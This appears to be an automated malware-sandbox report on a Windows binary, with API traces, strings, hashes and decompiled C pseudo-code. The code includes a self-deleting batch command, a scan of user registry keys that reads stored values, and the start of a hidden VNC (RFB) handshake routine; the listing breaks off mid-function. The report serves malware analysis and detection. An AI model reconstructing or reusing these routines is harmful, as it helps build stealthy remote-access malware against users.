DeleteFileW.KERNEL32(?), ref: 00412F9F

Part of subcall function 00417FC0: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,00000000,00412EE6,?,00000000), ref: 00417FDC
Part of subcall function 00417FC0: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00412EE6,?,00000000), ref: 00417FFF
Part of subcall function 00417FC0: CloseHandle.KERNEL32(00000000,?,00000000,00412EE6,?,00000000), ref: 0041800C
Part of subcall function 00417FC0: SetFileAttributesW.KERNEL32(?,00000080,?,00000000,00412EE6,?,00000000), ref: 0041801D
Part of subcall function 00417FC0: DeleteFileW.KERNEL32(?,?,00000000,00412EE6,?,00000000), ref: 00418024

Strings

bat, xrefs: 00412E89
D, xrefs: 00412F64
@echo off%sdel /F "%s", xrefs: 00412EC4
/c "%s", xrefs: 00412F09
ComSpec, xrefs: 00412F31

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreateDeleteFreeHeapPath$CharCloseCombineCountEnvironmentHandleTempTickVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$D$bat
API String ID: 1930972344-2561832857
Opcode ID: 11cac2dc6d8ef78dc0dcbaf9d574d644f00f92f47b57800527b2c6b5c6b9a140
Instruction ID: 3369c501f2fe7777fcb9f45d1885ab026239c0684d40059ea28482de71ec20c1
Opcode Fuzzy Hash: 11cac2dc6d8ef78dc0dcbaf9d574d644f00f92f47b57800527b2c6b5c6b9a140
Instruction Fuzzy Hash: CE21F8716043016BD320DB65DD45FEBB7A8EFC4311F00492EF644D7190D6B8994A9BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00421C30, Relevance: 16.7, APIs: 11, Instructions: 243
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00421C30() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				signed int _t89;
				signed int _t94;
				signed int _t96;
				void* _t97;
				void* _t100;
				void* _t101;
				char* _t108;
				char* _t144;
				void* _t145;
				intOrPtr _t147;
				signed int _t152;
				int _t154;
				signed int _t155;
				signed int _t156;
				void* _t159;
				void* _t160;
				void* _t161;

				_t67 = HeapAlloc( *0x42e6d4, 8, 0xc0c);
				_t159 = _t67;
				 *(_t161 + 0x1c) = _t159;
				if(_t159 == 0) {
					L29:
					return _t67;
				} else {
					E00424100(0x83, _t161 + 0xa8);
					_t147 = _t161 + 0xe8;
					E00424100(0x84, _t147);
					 *((intOrPtr*)(_t161 + 0x44)) = _t161 + 0xb0;
					 *((intOrPtr*)(_t161 + 0x48)) = _t147;
					E00410870(_t161 + 0x2c, _t161 + 0x2c, 0, 8);
					E00424100(0x85, _t161 + 0x4c);
					E00424100(0x86, _t161 + 0x60);
					E00424100(0x87, _t161 + 0x40);
					E00424100(0x88, _t161 + 0x74);
					_t160 = _t159 + 0x1fe;
					_t12 = _t160 + 0x1fe; // 0x1fe
					_t144 = _t12;
					_t152 = 0;
					_t13 =  &(_t144[0x1fe]); // 0x3fc
					_t108 = _t13;
					 *(_t161 + 0x2c) = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t161 + 0x38 + _t152 * 4), 0, 8, _t161 + 0x18) == 0) {
							_t154 = 0;
							 *(_t161 + 0x34) = 0x104;
							if(RegEnumKeyExW( *(_t161 + 0x18), 0, _t161 + 0x13c, _t161 + 0x24, 0, 0, 0, 0) == 0) {
								do {
									_t155 = _t154 + 1;
									 *(_t161 + 0x40) = _t155;
									_t89 = E00416420( *(_t161 + 0x20), _t161 + 0x130, _t161 + 0x50, 0xff);
									 *(_t161 + 0x14) = _t89;
									if(_t89 != 0xffffffff && _t89 != 0) {
										_t94 = E00416420( *(_t161 + 0x24), _t161 + 0x130, _t161 + 0x64, 0xff);
										 *(_t161 + 0x14) = _t94;
										if(_t94 == 0xffffffff || _t94 == 0) {
											_t96 = E00416420( *(_t161 + 0x18), _t161 + 0x130, _t161 + 0x44, 0xff);
											 *(_t161 + 0x14) = _t96;
											if(_t96 != 0xffffffff && _t96 != 0) {
												goto L11;
											}
										} else {
											L11:
											_t97 =  *(_t161 + 0x18);
											 *((intOrPtr*)(_t161 + 0x44)) = 0xff;
											 *(_t161 + 0x34) = _t97;
											_t156 = _t155 | 0xffffffff;
											if(RegOpenKeyExW(_t97, _t161 + 0x134, 0, 1, _t161 + 0x20) == 0) {
												RegQueryValueExW( *(_t161 + 0x20), _t161 + 0x84, 0, 0, _t144, _t161 + 0x30);
												_t156 =  ==  ?  *(_t161 + 0x30) : _t156;
												RegCloseKey( *(_t161 + 0x20));
											}
											 *(_t161 + 0x14) = _t156;
											if(_t156 != 0xffffffff && _t156 != 0 && E00421BD0(_t144) > 0) {
												_t100 = E00424100(0x56, _t161 + 0x88);
												_push( *(_t161 + 0x1c));
												_push(_t144);
												_push(_t160);
												_t101 = E00411D10(_t100, 0x307, _t108, _t161 + 0x88);
												_t161 = _t161 + 0x10;
												if(_t101 > 0 && E00410D70(_t161 + 0x28, _t108, _t101) != 0) {
													 *((intOrPtr*)(_t161 + 0x28)) =  *((intOrPtr*)(_t161 + 0x28)) + 1;
												}
											}
										}
									}
									_t154 =  *(_t161 + 0x34);
									 *(_t161 + 0x34) = 0x104;
								} while (RegEnumKeyExW( *(_t161 + 0x18), _t154, _t161 + 0x13c, _t161 + 0x24, 0, 0, 0, 0) == 0);
							}
							RegCloseKey( *(_t161 + 0x18));
							_t152 =  *(_t161 + 0x2c);
						}
						_t152 = _t152 + 1;
						 *(_t161 + 0x2c) = _t152;
					} while (_t152 < 2);
					_t67 = HeapFree( *0x42e6d4, 0,  *(_t161 + 0x1c));
					if( *((intOrPtr*)(_t161 + 0x28)) <= 0) {
						_t67 =  *(_t161 + 0x24);
						if(_t67 != 0) {
							return HeapFree( *0x42e6d4, 0, _t67);
						}
						goto L29;
					} else {
						_t145 =  *(_t161 + 0x24);
						if(_t145 == 0) {
							goto L29;
						} else {
							if( *_t145 != 0) {
								E00424100(0x89, _t161 + 0x330);
								E0040D880(_t145, 0xcb, _t161 + 0x330);
							}
							return HeapFree( *0x42e6d4, 0, _t145);
						}
					}
				}
			}

0x00421c47
0x00421c4d
0x00421c4f
0x00421c55
0x00421f5b
0x00421f5b
0x00421c5b
0x00421c67
0x00421c6c
0x00421c78
0x00421c8f
0x00421c93
0x00421c97
0x00421ca5
0x00421cb3
0x00421cc1
0x00421ccf
0x00421cd4
0x00421cda
0x00421cda
0x00421ce0
0x00421ce2
0x00421ce2
0x00421ce8
0x00421cec
0x00421d07
0x00421d11
0x00421d26
0x00421d36
0x00421d40
0x00421d5a
0x00421d5b
0x00421d5f
0x00421d64
0x00421d6b
0x00421d91
0x00421d96
0x00421d9d
0x00421dbb
0x00421dc0
0x00421dc7
0x00000000
0x00000000
0x00421dd5
0x00421dd5
0x00421dd5
0x00421deb
0x00421df3
0x00421df7
0x00421e02
0x00421e1b
0x00421e27
0x00421e2d
0x00421e2d
0x00421e33
0x00421e3a
0x00421e55
0x00421e5e
0x00421e5f
0x00421e62
0x00421e6b
0x00421e70
0x00421e75
0x00421e85
0x00421e85
0x00421e75
0x00421e3a
0x00421d9d
0x00421e89
0x00421ea8
0x00421eb6
0x00421d40
0x00421ec3
0x00421ec9
0x00421ec9
0x00421ecd
0x00421ece
0x00421ed2
0x00421eef
0x00421ef6
0x00421f3d
0x00421f43
0x00000000
0x00421f4f
0x00000000
0x00421ef8
0x00421ef8
0x00421efe
0x00000000
0x00421f00
0x00421f04
0x00421f12
0x00421f21
0x00421f21
0x00421f3c
0x00421f3c
0x00421efe
0x00421ef6

APIs

HeapAlloc.KERNEL32(?,00000008,00000C0C,?,00000000), ref: 00421C47
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,00000000,?,00000000,00000008,?,00000000), ref: 00421CFF
RegEnumKeyExW.ADVAPI32 ref: 00421D2E
RegEnumKeyExW.ADVAPI32(00000000,00000104,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00421EB0

Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5

RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000001,00000000,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00421DFA
RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,000001FE,?), ref: 00421E1B
RegCloseKey.ADVAPI32(00000000), ref: 00421E2D
RegCloseKey.ADVAPI32(00000000), ref: 00421EC3
HeapFree.KERNEL32(?,00000000,?,?,00000000), ref: 00421EEF
HeapFree.KERNEL32(?,00000000,?), ref: 00421F30
HeapFree.KERNEL32(?,00000000,?), ref: 00421F4F

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CloseOpen$EnumQueryValue$AllocEnvironmentExpandStrings
String ID:
API String ID: 4155870178-0
Opcode ID: a71da2171ce97ae4f57e3157b7c8c0564d31bb7d8a1366b636c910df6c6e70ae
Instruction ID: c77a9d8e60490356592a22d56ba4c7f9111c260c5351c9b75bff1fecf2779d42
Opcode Fuzzy Hash: a71da2171ce97ae4f57e3157b7c8c0564d31bb7d8a1366b636c910df6c6e70ae
Instruction Fuzzy Hash: 1C81E4717043119BD320DF51EC44BABB7E8EFD8714F41491EBA84A32A0DB74E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00424750, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00424750() {
				void* __ebx;
				void* __edi;
				void* __esi;
				int* _t127;
				int* _t131;
				signed int _t132;
				int* _t133;
				int* _t134;
				int* _t135;
				signed int _t136;
				signed int _t137;
				int* _t140;
				signed int _t141;
				signed int _t144;
				signed int _t147;
				signed char _t150;
				void* _t154;
				int* _t168;
				int* _t172;
				int* _t181;
				int* _t185;
				int* _t190;
				void* _t191;
				int* _t194;
				int* _t195;
				intOrPtr _t198;
				void* _t200;
				signed int _t204;
				signed int _t205;
				long _t210;
				void* _t226;
				signed int _t241;
				long _t243;
				int* _t256;
				int _t257;
				void* _t258;
				long _t260;
				intOrPtr _t261;
				short* _t262;
				signed int _t267;
				void* _t268;
				signed int _t274;
				intOrPtr _t276;
				signed short* _t277;
				void* _t278;

				_t276 =  *((intOrPtr*)(_t278 + 0x124));
				_t263 =  *((intOrPtr*)(_t276 + 0x40));
				if( *((intOrPtr*)(_t276 + 0x40)) != 0) {
					 *(_t278 + 0x10) = 0;
					_t256 = E00418BD0(0x4e27, 0x10000000, _t263);
					__eflags = _t256;
					if(_t256 == 0) {
						L5:
						_t257 =  *(_t278 + 0x3c);
					} else {
						_t195 = E00418C20(_t256);
						 *(_t278 + 0x10) = _t195;
						__eflags = _t195;
						if(_t195 == 0) {
							goto L5;
						} else {
							_t257 = _t256[3];
						}
					}
					_t127 =  *(_t278 + 0x10);
					 *((intOrPtr*)(_t276 + 0x3c)) = 0;
					 *((intOrPtr*)(_t276 + 0x38)) = 0;
					__eflags = _t127;
					if(_t127 != 0) {
						__eflags = _t257 - 0x10;
						if(_t257 > 0x10) {
							asm("sbb edx, edx");
							_t241 = ( ~( *((intOrPtr*)(_t276 + 0x18)) - 0x00000001 & 0x000000ff) & 0x00000020) + 0x00000020 & 0x0000ffff;
							_t277 = _t127;
							_t131 = _t127 + _t257;
							__eflags = _t131;
							 *(_t278 + 0x3c) = _t241;
							 *(_t278 + 0x44) = _t131;
							 *(_t278 + 0x18) = 1;
							while(1) {
								_t132 = _t277[1] & 0x0000ffff;
								__eflags = _t132 - 0x10;
								if(_t132 < 0x10) {
									goto L71;
								}
								_t204 = _t277[2] & 0x0000ffff;
								__eflags = _t204 - _t132;
								if(_t204 < _t132) {
									__eflags = _t277[3] - _t132;
									if(_t277[3] < _t132) {
										__eflags = _t277[4] - _t132;
										if(_t277[4] < _t132) {
											__eflags = _t277[5] - _t132;
											if(_t277[5] < _t132) {
												__eflags = _t277[6] - _t132;
												if(_t277[6] < _t132) {
													__eflags = _t277[7] - _t132;
													if(_t277[7] < _t132) {
														_t133 = _t277 + _t204;
														_t205 =  *_t277 & 0x0000ffff;
														_t267 = _t205 >> 0x00000009 & 0x00000008;
														__eflags = (_t205 & _t241) - _t241;
														if((_t205 & _t241) != _t241) {
															L60:
															_t134 =  *(_t278 + 0x44);
															_t277 = _t277 + (_t277[1] & 0x0000ffff);
															_t106 =  &(_t277[8]); // 0x10
															__eflags = _t106 - _t134;
															if(_t106 <= _t134) {
																__eflags = _t277 + (_t277[1] & 0x0000ffff) - _t134;
																if(_t277 + (_t277[1] & 0x0000ffff) <= _t134) {
																	 *(_t278 + 0x18) =  *(_t278 + 0x18) + 1;
																	_t241 =  *(_t278 + 0x3c);
																	continue;
																}
															}
														} else {
															_t198 =  *((intOrPtr*)(_t278 + 0x12c));
															_t243 =  *(_t198 + 0xc);
															_t258 =  *(_t198 + 8);
															_t210 = 0;
															 *(_t278 + 0x1c) = 0x2a23;
															 *(_t278 + 0x20) = _t133;
															__eflags = _t133;
															if(_t133 != 0) {
																__eflags =  *_t133;
																if( *_t133 != 0) {
																	do {
																		_t210 = _t210 + 1;
																		__eflags =  *((char*)(_t133 + _t210));
																	} while ( *((char*)(_t133 + _t210)) != 0);
																}
															}
															 *(_t278 + 0x24) = _t210;
															 *(_t278 + 0x38) = _t267 | 0x00000001;
															 *(_t278 + 0x28) = _t258;
															 *(_t278 + 0x2c) = _t243;
															_t135 = E00412090(_t278 + 0x1c);
															__eflags = _t135;
															if(_t135 == 0) {
																goto L60;
															} else {
																_t214 =  *(_t198 + 0x44);
																__eflags =  *(_t198 + 0x44);
																if(__eflags == 0) {
																	L24:
																	_t136 = _t277[4] & 0x0000ffff;
																	__eflags = _t136;
																	if(_t136 == 0) {
																		L26:
																		_t137 = _t277[5] & 0x0000ffff;
																		__eflags = _t137;
																		if(_t137 == 0) {
																			L28:
																			__eflags =  *_t277 & 0x00000010;
																			if(( *_t277 & 0x00000010) == 0) {
																				L35:
																				E00410870(_t278 + 0x24, _t278 + 0x24, 0, 0x1c);
																				_t260 = _t277 + (_t277[2] & 0x0000ffff);
																				__eflags = _t260;
																				 *(_t278 + 0x1c) =  *_t277 & 0x0000ffff;
																				if(_t260 != 0) {
																					_t268 = 0;
																					__eflags =  *_t260;
																					if( *_t260 != 0) {
																						do {
																							_t268 = _t268 + 1;
																							__eflags =  *((char*)(_t268 + _t260));
																						} while ( *((char*)(_t268 + _t260)) != 0);
																					}
																					_t70 = _t268 + 1; // 0x2
																					_t140 = _t70;
																					__eflags = _t140;
																					if(_t140 != 0) {
																						_t140 = HeapAlloc( *0x42e6d4, 8,  &(_t140[1]));
																						__eflags = _t140;
																						if(_t140 != 0) {
																							_t140 = E00410820(_t140, _t260, _t268);
																						}
																					}
																					_t260 = 0;
																					__eflags = 0;
																				} else {
																					_t140 = 0;
																				}
																				 *(_t278 + 0x20) = _t140;
																				_t141 = _t277[3] & 0x0000ffff;
																				__eflags = _t141 - _t260;
																				if(_t141 != _t260) {
																					__eflags = _t141 | 0xffffffff;
																					 *(_t278 + 0x24) = E00410E10(_t141 | 0xffffffff, _t277 + _t141);
																				} else {
																					 *(_t278 + 0x24) = _t260;
																				}
																				_t144 = _t277[6] & 0x0000ffff;
																				__eflags = _t144 - _t260;
																				if(_t144 != _t260) {
																					__eflags = _t144 | 0xffffffff;
																					 *(_t278 + 0x28) = E00410E10(_t144 | 0xffffffff, _t277 + _t144);
																				} else {
																					 *(_t278 + 0x28) = _t260;
																				}
																				_t147 = _t277[7] & 0x0000ffff;
																				__eflags = _t147 - _t260;
																				if(_t147 != _t260) {
																					__eflags = _t147 | 0xffffffff;
																					 *(_t278 + 0x2c) = E00410E10(_t147 | 0xffffffff, _t277 + _t147);
																				} else {
																					 *(_t278 + 0x2c) = _t260;
																				}
																				_t150 =  *_t277 & 0x0000ffff;
																				__eflags = _t150 & 0x00000003;
																				if((_t150 & 0x00000003) != 0) {
																					E00425CF0( *(_t198 + 0x3c),  *(_t198 + 0x38));
																					 *(_t198 + 0x3c) = _t260;
																					_t154 = HeapAlloc( *0x42e6d4, _t260, 0x20);
																					__eflags = _t154 - _t260;
																					if(_t154 != _t260) {
																						_t154 = E00410820(_t154, _t278 + 0x20, 0x1c);
																					}
																					 *(_t198 + 0x38) = _t154;
																					__eflags = _t154 - _t260;
																					if(_t154 == _t260) {
																						E00425C80(_t278 + 0x1c);
																					} else {
																						 *(_t198 + 0x3c) =  *(_t198 + 0x3c) + 1;
																					}
																				} else {
																					__eflags = _t150 & 0x0000000c;
																					if(__eflags == 0) {
																						E00425C80(_t278 + 0x1c);
																						goto L60;
																					} else {
																						_t261 =  *((intOrPtr*)(_t278 + 0x12c));
																						_t200 = E00418C90(0x40000000,  *(_t278 + 0x18),  *((intOrPtr*)(_t261 + 0x40)), __eflags, _t278 + 0x34);
																						 *(_t278 + 0x30) = _t200;
																						__eflags = _t200;
																						if(_t200 == 0) {
																							L70:
																							E00425C80(_t278 + 0x1c);
																							E00425CF0( *(_t261 + 0x3c),  *((intOrPtr*)(_t261 + 0x38)));
																							 *(_t261 + 0x3c) = 0;
																						} else {
																							_t168 = E00419620( *((intOrPtr*)(_t278 + 0x34)), _t200);
																							__eflags = _t168;
																							if(_t168 == 0) {
																								L68:
																								__eflags = _t200;
																								if(_t200 != 0) {
																									HeapFree( *0x42e6d4, 0, _t200);
																								}
																								goto L70;
																							} else {
																								_t171 =  *(_t261 + 0x3c) + 1;
																								_t273 = _t261 + 0x38;
																								_t172 = E00410740(( *(_t261 + 0x3c) + 1) * 8 - _t171 + ( *(_t261 + 0x3c) + 1) * 8 - _t171 + ( *(_t261 + 0x3c) + 1) * 8 - _t171 + ( *(_t261 + 0x3c) + 1) * 8 - _t171, _t261 + 0x38);
																								__eflags = _t172;
																								if(_t172 == 0) {
																									goto L68;
																								} else {
																									_t173 =  *(_t261 + 0x3c);
																									 *(_t261 + 0x3c) =  *(_t261 + 0x3c) + 1;
																									E00410820( *_t273 + (_t173 * 8 - _t173) * 4, _t278 + 0x20, 0x1c);
																									goto L60;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t277[6];
																				if(_t277[6] <= 0) {
																					goto L35;
																				} else {
																					_push(_t278 + 0xc0);
																					_t262 = _t278 + 0x80;
																					E0041D340(_t262, 1);
																					_t226 = _t277 + (_t277[6] & 0x0000ffff);
																					_push(E00411B00(_t226));
																					_push(_t226);
																					_push(_t278 + 0x70);
																					_t181 = E00412470();
																					__eflags = _t181;
																					if(_t181 == 0) {
																						goto L60;
																					} else {
																						E00411310(_t262, _t278 + 0x68);
																						 *((intOrPtr*)(_t278 + 0x54)) = 0x10;
																						 *(_t278 + 0x28) = 0x80000001;
																						_t274 = _t267 | 0xffffffff;
																						_t185 = RegOpenKeyExW(0x80000001, _t278 + 0xcc, 0, 1, _t278 + 0x14);
																						__eflags = _t185;
																						if(_t185 != 0) {
																							goto L35;
																						} else {
																							__eflags = RegQueryValueExW( *(_t278 + 0x18), _t262, _t185, _t185, _t278 + 0x4c, _t278 + 0x40);
																							_t275 =  ==  ?  *(_t278 + 0x40) : _t274;
																							RegCloseKey( *(_t278 + 0x14));
																							__eflags = ( ==  ?  *(_t278 + 0x40) : _t274) - 0x10;
																							if(( ==  ?  *(_t278 + 0x40) : _t274) != 0x10) {
																								goto L35;
																							} else {
																								GetLocalTime(_t278 + 0x58);
																								__eflags =  *((intOrPtr*)(_t278 + 0x4e)) -  *((intOrPtr*)(_t278 + 0x5e));
																								if( *((intOrPtr*)(_t278 + 0x4e)) !=  *((intOrPtr*)(_t278 + 0x5e))) {
																									goto L35;
																								} else {
																									__eflags =  *((intOrPtr*)(_t278 + 0x4a)) -  *((intOrPtr*)(_t278 + 0x5a));
																									if( *((intOrPtr*)(_t278 + 0x4a)) ==  *((intOrPtr*)(_t278 + 0x5a))) {
																										goto L60;
																									} else {
																										goto L35;
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t190 = E004242A0(_t277 + _t137,  *((intOrPtr*)(_t198 + 0x24)),  *((intOrPtr*)(_t198 + 0x28)));
																			__eflags = _t190;
																			if(_t190 == 0) {
																				goto L60;
																			} else {
																				goto L28;
																			}
																		}
																	} else {
																		_t191 = E004242A0(_t277 + _t136,  *((intOrPtr*)(_t198 + 0x24)),  *((intOrPtr*)(_t198 + 0x28)));
																		__eflags = _t191 - 1;
																		if(_t191 == 1) {
																			goto L60;
																		} else {
																			goto L26;
																		}
																	}
																} else {
																	_push(_t267);
																	_push( *(_t198 + 0xc));
																	_push( *(_t198 + 8));
																	_t194 = E00424660(4, _t214, __eflags);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		goto L60;
																	} else {
																		goto L24;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
								goto L71;
							}
						}
						L71:
						HeapFree( *0x42e6d4, 0,  *(_t278 + 0x10));
						_t276 =  *((intOrPtr*)(_t278 + 0x12c));
					}
					__eflags = 0 -  *((intOrPtr*)(_t276 + 0x3c));
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					return 0;
				}
			}

0x00424758
0x00424760
0x00424766
0x00424781
0x0042478e
0x00424792
0x00424794
0x004247a8
0x004247a8
0x00424796
0x00424796
0x0042479b
0x0042479f
0x004247a1
0x00000000
0x004247a3
0x004247a3
0x004247a3
0x004247a1
0x004247ac
0x004247b0
0x004247b3
0x004247b6
0x004247b8
0x004247be
0x004247c1
0x004247d1
0x004247d9
0x004247dc
0x004247de
0x004247de
0x004247e0
0x004247e4
0x004247e8
0x004247f0
0x004247f0
0x004247f4
0x004247f7
0x00000000
0x00000000
0x004247fd
0x00424801
0x00424804
0x0042480a
0x0042480e
0x00424814
0x00424818
0x0042481e
0x00424822
0x00424828
0x0042482c
0x00424832
0x00424836
0x0042483c
0x00424840
0x0042484b
0x0042484e
0x00424851
0x00424b50
0x00424b54
0x00424b58
0x00424b5a
0x00424b5d
0x00424b5f
0x00424b6b
0x00424b6d
0x00424b73
0x00424b77
0x00000000
0x00424b77
0x00424b6d
0x00424857
0x00424857
0x0042485e
0x00424861
0x00424864
0x00424866
0x0042486d
0x00424871
0x00424873
0x00424875
0x00424877
0x00424880
0x00424880
0x00424881
0x00424881
0x00424880
0x00424877
0x00424887
0x00424890
0x00424898
0x0042489c
0x004248a0
0x004248a5
0x004248a7
0x00000000
0x004248ad
0x004248ad
0x004248b0
0x004248b2
0x004248cf
0x004248cf
0x004248d3
0x004248d6
0x004248f1
0x004248f1
0x004248f5
0x004248f8
0x00424913
0x00424913
0x00424917
0x004249f3
0x004249fc
0x00424a05
0x00424a05
0x00424a0b
0x00424a0f
0x00424a15
0x00424a17
0x00424a1a
0x00424a20
0x00424a20
0x00424a21
0x00424a21
0x00424a20
0x00424a27
0x00424a27
0x00424a2a
0x00424a2c
0x00424a3b
0x00424a41
0x00424a43
0x00424a48
0x00424a48
0x00424a43
0x00424a4d
0x00424a4d
0x00424a11
0x00424a11
0x00424a11
0x00424a4f
0x00424a53
0x00424a57
0x00424a5a
0x00424a66
0x00424a6e
0x00424a5c
0x00424a5c
0x00424a5c
0x00424a72
0x00424a76
0x00424a79
0x00424a85
0x00424a8d
0x00424a7b
0x00424a7b
0x00424a7b
0x00424a91
0x00424a95
0x00424a98
0x00424aa4
0x00424aac
0x00424a9a
0x00424a9a
0x00424a9a
0x00424ab0
0x00424ab4
0x00424ab6
0x00424b87
0x00424b95
0x00424b98
0x00424b9e
0x00424ba0
0x00424baa
0x00424baa
0x00424baf
0x00424bb2
0x00424bb4
0x00424bbf
0x00424bb6
0x00424bb6
0x00424bb6
0x00424abc
0x00424abc
0x00424abe
0x00424b4b
0x00000000
0x00424ac4
0x00424ac4
0x00424ae1
0x00424ae3
0x00424ae7
0x00424ae9
0x00424bda
0x00424bde
0x00424bea
0x00424bef
0x00424aef
0x00424af5
0x00424afa
0x00424afc
0x00424bc6
0x00424bc6
0x00424bc8
0x00424bd4
0x00424bd4
0x00000000
0x00424b02
0x00424b05
0x00424b13
0x00424b16
0x00424b1b
0x00424b1d
0x00000000
0x00424b23
0x00424b23
0x00424b32
0x00424b40
0x00000000
0x00424b40
0x00424b1d
0x00424afc
0x00424ae9
0x00424abe
0x0042491d
0x0042491d
0x00424922
0x00000000
0x00424928
0x0042492f
0x00424932
0x00424939
0x00424942
0x00424949
0x0042494a
0x0042494f
0x00424950
0x00424955
0x00424957
0x00000000
0x0042495d
0x00424963
0x0042497e
0x00424986
0x0042498e
0x00424991
0x00424997
0x00424999
0x00000000
0x0042499b
0x004249b9
0x004249bb
0x004249c1
0x004249c7
0x004249ca
0x00000000
0x004249cc
0x004249d1
0x004249dc
0x004249e1
0x00000000
0x004249e3
0x004249e8
0x004249ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004249ed
0x004249e1
0x004249ca
0x00424999
0x00424957
0x00424922
0x004248fa
0x00424906
0x0042490b
0x0042490d
0x00000000
0x00000000
0x00000000
0x00000000
0x0042490d
0x004248d8
0x004248e4
0x004248e9
0x004248eb
0x00000000
0x00000000
0x00000000
0x00000000
0x004248eb
0x004248b4
0x004248ba
0x004248bb
0x004248bc
0x004248c2
0x004248c7
0x004248c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004248c9
0x004248b2
0x004248a7
0x00424851
0x00424836
0x0042482c
0x00424822
0x00424818
0x0042480e
0x00000000
0x00424804
0x004247f0
0x00424bf6
0x00424c04
0x00424c0a
0x00424c0a
0x00424c13
0x00424c18
0x00424c24
0x00424768
0x00424774
0x00424774

Strings

#*, xrefs: 00424866

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: #*
API String ID: 0-617327688
Opcode ID: c7c6cc96431de10e01a59e2fea838ddf112d96ff851207b2db074fb64dca1108
Instruction ID: c01bc10db75af69655cd76f4fc787d2ba62fe7d6d24990ce14890d101d8856a2
Opcode Fuzzy Hash: c7c6cc96431de10e01a59e2fea838ddf112d96ff851207b2db074fb64dca1108
Instruction Fuzzy Hash: 46D1D3702043249BDB14DF65E880BABB7E4FFC4704F80891EF99587241D7B8E981CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406350, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 315
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00406350() {
				signed int __ebx;
				void* __edi;
				void* __esi;
				void __ebp;
				intOrPtr _t204;
				void* _t207;
				signed char _t210;
				long _t223;
				signed int _t252;
				void* _t262;
				void* _t263;
				void* _t266;
				long _t268;
				void* _t270;
				intOrPtr _t279;
				void* _t282;
				void* _t284;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t355;
				signed int _t356;
				void* _t360;
				intOrPtr* _t362;
				signed int _t363;
				void* _t364;
				void* _t365;

				_t277 =  *((intOrPtr*)(_t365 + 0x184));
				_t362 = __imp__#19;
				_t204 =  *_t362( *((intOrPtr*)(_t365 + 0x184)), "RFB 003.003\n", 0xc, 0);
				if(_t204 != 0xc) {
					L106:
					return _t204;
				} else {
					_t204 = E00414B90(0xc, _t277, 0x1b7740, _t365 + 0x38);
					if(_t204 == 0) {
						goto L106;
					} else {
						_t207 = 0;
						while(1) {
							_t3 = _t207 + "RFB "; // 0x20424652
							_t284 =  *((char*)(_t365 + _t207 + 0x38)) -  *_t3;
							if(_t284 != 0) {
								break;
							}
							_t207 = _t207 + 1;
							if(_t207 < 4) {
								continue;
							} else {
								L7:
								 *((char*)(_t365 + 0x3f)) = 0;
								 *((char*)(_t365 + 0x43)) = 0;
								_t210 = E004110A0(_t365 + 0x40, 0);
								_t204 = ((E004110A0(_t365 + 0x3c, 0) & 0x000000ff | (_t210 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
								if(_t204 > 0x300) {
									goto L106;
								} else {
									 *((intOrPtr*)(_t365 + 0x18)) = 1;
									 *((intOrPtr*)(_t365 + 0x2c)) = 0;
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t365 + 0x194)) + 4))))(_t365 + 0x28);
									_t218 =  *(_t365 + 0x14);
									_t353 =  *((intOrPtr*)(_t365 + 0x190));
									_push(0);
									_push(4);
									_push(_t365 + 0x34);
									_push( *((intOrPtr*)(_t365 + 0x190)));
